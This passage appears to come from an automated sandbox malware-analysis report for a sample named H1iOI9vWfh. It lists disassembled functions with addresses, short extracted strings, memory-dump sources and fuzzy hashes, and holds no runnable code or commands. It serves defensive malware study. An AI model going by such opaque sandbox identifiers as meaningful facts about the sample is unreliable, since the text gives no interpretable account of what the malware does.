Instruction Fuzzy Hash: 9822E77290C7408BD724DF38C4913AEBBD2ABD5324F194A2EE5E9973D1DA388941CB47

Function 009C144C Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

V, xrefs: 009C145A
0, xrefs: 009C1876
e, xrefs: 009C1AA9

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 0$V$e
API String ID: 0-3964817793
Opcode ID: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
Instruction ID: b0e6e281edf0b55d2ada5efe3cc78cf47322531e99a7b94c98a6ffb3f0894324
Opcode Fuzzy Hash: c7716370ac8927f06ffe637d3cea15850e05a15dbd07c9effa12d3fdb0013073
Instruction Fuzzy Hash: 8922D83290D7908BD324DF3885957AEBBD1ABD6320F194E2DE5E9873D2D6388901CB47

Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON

Download Yara Rule

Strings

V3R5, xrefs: 00426774
67, xrefs: 0042677F
dB, xrefs: 004264D2

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 67$V3R5$dB
API String ID: 0-2543814982
Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A

Function 009C87DF Relevance: 4.0, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

DX8Z, xrefs: 009C8956
?TUV, xrefs: 009C896B
"w+y, xrefs: 009C8812

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: "w+y$?TUV$DX8Z
API String ID: 0-3307990326
Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
Instruction ID: 1aac82ce3a3cc2fccc500dad46d79b00cefacde7a8a156530299ac5af61e20d7
Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
Instruction Fuzzy Hash: A281BD75A007128FC728CF29C890B67B7F2FF99710B19859DD8824FB65EB34A841CB55

Function 009B092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 009B0966
., xrefs: 009B095F
GetProcAddress., xrefs: 009B09DC, 009B09DF, 009B09E4

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: d5ccccb239d267dee77c9fd3047dc5bff684dd2e02043b2d7da714a558b8c7e8
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: B7318AB6900609CFDB10CF99C984AEEBBF9FF88324F24404AD841A7351D771EA45CBA4

Function 00404CB0 Relevance: 3.3, Strings: 2, Instructions: 833COMMON

Download Yara Rule

Strings

0, xrefs: 0040562F
8, xrefs: 00405627

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
Instruction ID: d40c633f6dc63a9644a0400b392de52ca6438bdc0a59f23ad90aea60c423d6c9
Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
Instruction Fuzzy Hash: BC7213716087409FD714CF18C880BABBBE1EB88314F04892EF9899B391D379D948DF96

Function 009B4F17 Relevance: 3.3, Strings: 2, Instructions: 833COMMON

Download Yara Rule

Strings

0, xrefs: 009B5896
8, xrefs: 009B588E

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
Instruction ID: f9b3c6c5fe97e9af983e01b9f589e40ff3495a084853a5ef813addf0ec784913
Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
Instruction Fuzzy Hash: 847268716097409FD724CF18C980BAFBBE1AF98324F05892DF9998B391D375D948CB92

Function 004223B8 Relevance: 3.3, Strings: 2, Instructions: 772COMMON

Download Yara Rule

Strings

B*B, xrefs: 00422A24, 00422A2F
"*B, xrefs: 00422A0D

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: "*B$B*B
API String ID: 0-3938277345
Opcode ID: 78e285193c8325869296b3d11f9fc92a1318eae965f379fbd1dbd179110fea27
Instruction ID: c0ff169c622c87bee100c6609ea31c9af3570951461718032b7520edbb3c94ef
Opcode Fuzzy Hash: 78e285193c8325869296b3d11f9fc92a1318eae965f379fbd1dbd179110fea27
Instruction Fuzzy Hash: 53421276A00211DFCB18CF68DC90AAEB7B2FF49310F598179E905AB395D734AD11CB84

Function 00437399 Relevance: 3.0, Strings: 2, Instructions: 455COMMON

Download Yara Rule

Strings

., xrefs: 00437535
kl, xrefs: 004377AC

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: .$kl
API String ID: 0-2631956018
Opcode ID: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
Instruction ID: 6e525d0f0299ed0e456b3adafb39e2bcab09d4ef44449d93680b2b5d8b67f0fb
Opcode Fuzzy Hash: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
Instruction Fuzzy Hash: 1FE1173A218709CBCB189F78EC5127A73F1FF4A741F4A887DD8818B2A1E7B99950C714

Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

BE, xrefs: 0040AB5D
de, xrefs: 0040AAF3

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: BE$de
API String ID: 0-1272349043
Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787

Function 009BABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

BE, xrefs: 009BADC4
de, xrefs: 009BAD5A

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: BE$de
API String ID: 0-1272349043
Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction ID: 71853e817490982366fdaca760bffb95df69bee640a065ec06d92677c0ee6594
Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction Fuzzy Hash: 28D1177164C3648BD728DF2888516FFFBE6ABC1314F18492CE8E19B395D675C906C782

Function 009B45D7 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 009B4652
IEND, xrefs: 009B49C8

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
Instruction ID: 1ad3fdbcefd52816e0a41f2ba90054276e48b33fbe9bd6ae64069b297cf84429
Opcode Fuzzy Hash: 77fecbe1ae68033b4a8663d8c056a40f5f9b3b2dca52a2b3e7224ada374ec122
Instruction Fuzzy Hash: CFD18DB1908344DFE720CF18C945B9BBBE4AF98324F14492DF9999B382D775D908CB92

Function 004239F2 Relevance: 2.8, Strings: 2, Instructions: 296COMMON

Download Yara Rule

Strings

?{;}, xrefs: 00423815
+oQ, xrefs: 00423838

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: +oQ$?{;}
API String ID: 0-1414831546
Opcode ID: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
Instruction ID: f7e0cf01948a060ca3ae4ae96257901d3d9473cfc3be429b8585dccf822635a3
Opcode Fuzzy Hash: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
Instruction Fuzzy Hash: BCB1BFB4E043189FEB20DF68D942B9EBBB0FB45304F1081ADE158AB381D7758946CF96

Function 0042B1C0 Relevance: 2.8, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

RU]l, xrefs: 0042B1D8
Fg, xrefs: 0042B257

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: Fg$RU]l
API String ID: 0-3680832515
Opcode ID: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
Instruction ID: 6f8db59bce85ef316af4e5eced37d01641f7d5c841364d3efc2c21db6cf2a903
Opcode Fuzzy Hash: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
Instruction Fuzzy Hash: 2171087120D3808BE7398F25D8A57EB7BD2EBD2304F58996DC0C987392DB78440ACB56

Function 009DB427 Relevance: 2.8, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

Fg, xrefs: 009DB4BE
RU]l, xrefs: 009DB43F

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: Fg$RU]l
API String ID: 0-3680832515
Opcode ID: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
Instruction ID: 4025fede8059d8d33bf4079b621913cb6f2c2aacf624c9ad319fbfb189b4234a
Opcode Fuzzy Hash: 212695677cf782d22b69bcc5005693ffe3c19f735568b368facab7bd000f874a
Instruction Fuzzy Hash: 3B71D37125D3C08BE7398F24C8617EABBD6ABE2314F18896DD0D947392DB39440ACB12

Function 004256F9 Relevance: 2.7, Strings: 2, Instructions: 219COMMON

Download Yara Rule

Strings

h, xrefs: 004258EC
O28+, xrefs: 00425935, 00425942

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: O28+$h
API String ID: 0-657163135
Opcode ID: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
Instruction ID: 943cae955c8ebe7c4b26d457fd1afafbf5e793f4316e69c7cecf830d1c43eab0
Opcode Fuzzy Hash: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
Instruction Fuzzy Hash: B561BE32B887258BD3149A38A8901B7F791EB55350F88473EDD96873C2E63C9D09C3DA

Function 009ECD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

ihgf, xrefs: 009ECE7A
@, xrefs: 009ECE5C

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: @$ihgf
API String ID: 0-73152791
Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
Instruction ID: e88b414c4018b0f225a7462e9b10fa23a2f7c484ce94732f0540e48d4af247d1
Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
Instruction Fuzzy Hash: 674124B1A043418BD715CF25C84277BB7A6FFD2328F14862CE4959B391E7359C06CB92

Function 009C554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON

Download Yara Rule

Strings

Z\, xrefs: 009C55AB
^P, xrefs: 009C55B2

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: Z\$^P
API String ID: 0-3724859648
Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
Instruction ID: 5e45678016346b695b289e5a628e3be6873dd12db3a616379af876ed49f31c7f
Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
Instruction Fuzzy Hash: 2C41C2B1911A00CFC718CF28C892B62B7B2FF99324B16855CD4968F765E738E841CB55

Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

AzB, xrefs: 004275AA
`rB, xrefs: 00427341

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: AzB$`rB
API String ID: 0-365317308
Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A

Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

AzB, xrefs: 004275AA
`rB, xrefs: 00427341

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: AzB$`rB
API String ID: 0-365317308
Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A

Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON

Download Yara Rule

Strings

c$, xrefs: 00417707

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: c$
API String ID: 0-2516980088
Opcode ID: 3e7173b7f35150ce67f14e4cf7677baf70ca03931a29a373c7b3ea58a15b4991
Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
Opcode Fuzzy Hash: 3e7173b7f35150ce67f14e4cf7677baf70ca03931a29a373c7b3ea58a15b4991
Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58

Function 00439830 Relevance: 1.9, Strings: 1, Instructions: 681COMMON

Download Yara Rule

Strings

f, xrefs: 00439A65

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 5a2b71fe6b7abe8913033312b3adb200dd37ce9910002ae41400eab354b8cdfc
Instruction ID: c6061003a35e321c419c30bd02a3c4e1c0b56f4f8cbc670ef9e4360bbe252bef
Opcode Fuzzy Hash: 5a2b71fe6b7abe8913033312b3adb200dd37ce9910002ae41400eab354b8cdfc
Instruction Fuzzy Hash: 7722EF756083518FD718CF25C880A2BBBE2BBC9314F199A2DE4D587391DBB4EC06CB46

Function 009E9A97 Relevance: 1.9, Strings: 1, Instructions: 681COMMON

Download Yara Rule

Strings

f, xrefs: 009E9CCC

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
Instruction ID: 0b743a091a75e3e92c5c3ebae88667d3965c7096c4b4e90270f6ff7309316eae
Opcode Fuzzy Hash: 63a83f5a27331d9fe3a04257bda5fcaf30bc217a6dc898aca3077588f1bd9e28
Instruction Fuzzy Hash: A222EF756083918FD715CF26C880B2ABBE6BBD9314F188A2CE5D587391DB74EC05CB42

Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON

Download Yara Rule

Strings

A67H, xrefs: 004164FD

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: A67H
API String ID: 0-3389657328
Opcode ID: 025ab6247b28a9282489cbf8863c1f11cc422bce5e661f3cde5867652b65232c
Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
Opcode Fuzzy Hash: 025ab6247b28a9282489cbf8863c1f11cc422bce5e661f3cde5867652b65232c
Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58

Function 009C8F35 Relevance: 1.8, Strings: 1, Instructions: 598COMMON

Download Yara Rule

Strings

[, xrefs: 009C942B

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: [
API String ID: 0-3878419350
Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
Instruction ID: 3a902b1fcb7fa21c1a9b7a3dfe7ee0a05a341567a770d69e81ea1260bd07e5a2
Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
Instruction Fuzzy Hash: 85021275A00702CBCB24CF29C8D1B62B7F2FF95714B19859CC4864BBA5EB39E842CB51

Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

,)*k, xrefs: 00436D25

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ,)*k
API String ID: 2994545307-1228391949
Opcode ID: 3abeb72b50cbf0ea3c5cb2ec33269c319db1e6da438ada41a467feb5054111f7
Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
Opcode Fuzzy Hash: 3abeb72b50cbf0ea3c5cb2ec33269c319db1e6da438ada41a467feb5054111f7
Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A

Function 009E6E67 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

,)*k, xrefs: 009E6F8C

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: ,)*k
API String ID: 0-1228391949
Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
Instruction ID: a50af3bae7fc6e36be3948be83895cf7f0e4367cd4088b85e05dfe23560748d1
Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
Instruction Fuzzy Hash: 36C15675A0C3905BD726DFA2C880A3FFBE6ABE6704F189A2CE58553791D6319C40C793

Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON

Download Yara Rule

Strings

m, xrefs: 00427DE0

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 6ef6d805ebeae707db88c870f1bf3431cf214446e2165707fa793f0aed11e90b
Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
Opcode Fuzzy Hash: 6ef6d805ebeae707db88c870f1bf3431cf214446e2165707fa793f0aed11e90b
Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96

Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

167H, xrefs: 00425A65

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: 167H
API String ID: 2994545307-2704650348
Opcode ID: 47f0214db84f49b5bfad94cac133fa0217f1a5aa21233c84e6ce32df6523bf1a
Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
Opcode Fuzzy Hash: 47f0214db84f49b5bfad94cac133fa0217f1a5aa21233c84e6ce32df6523bf1a
Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A

Function 009CC921 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

. , xrefs: 009CC9CE

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
Instruction ID: 26a0eae607ee06cd7bde5b2e5bd6b981afd366dd8b63bd99f226dc4ff8d1db9d
Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
Instruction Fuzzy Hash: 2EC14AB1D00211CBCB24CF68C851BBBBBB1FF95310F19865DD899AB790E734A841CB91

Function 009D5BF7 Relevance: 1.7, Strings: 1, Instructions: 445COMMON

Download Yara Rule

Strings

167H, xrefs: 009D5CCC

Memory Dump Source

Source File: 00000000.00000002.2615319732.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9b0000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: 167H
API String ID: 0-2704650348
Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
Instruction ID: edc1296db898e33ba68c97a2c12e721b46bbcea40d99cd89fe2763fa8d402107
Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
Instruction Fuzzy Hash: EFD17632A887404BD714CF28C8817ABB796EFD5310F1AC62EE9958B3D1D7389E05C792

Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

. , xrefs: 0041C767

Memory Dump Source

Source File: 00000000.00000002.2615063451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2615063451.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H1iOI9vWfh.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
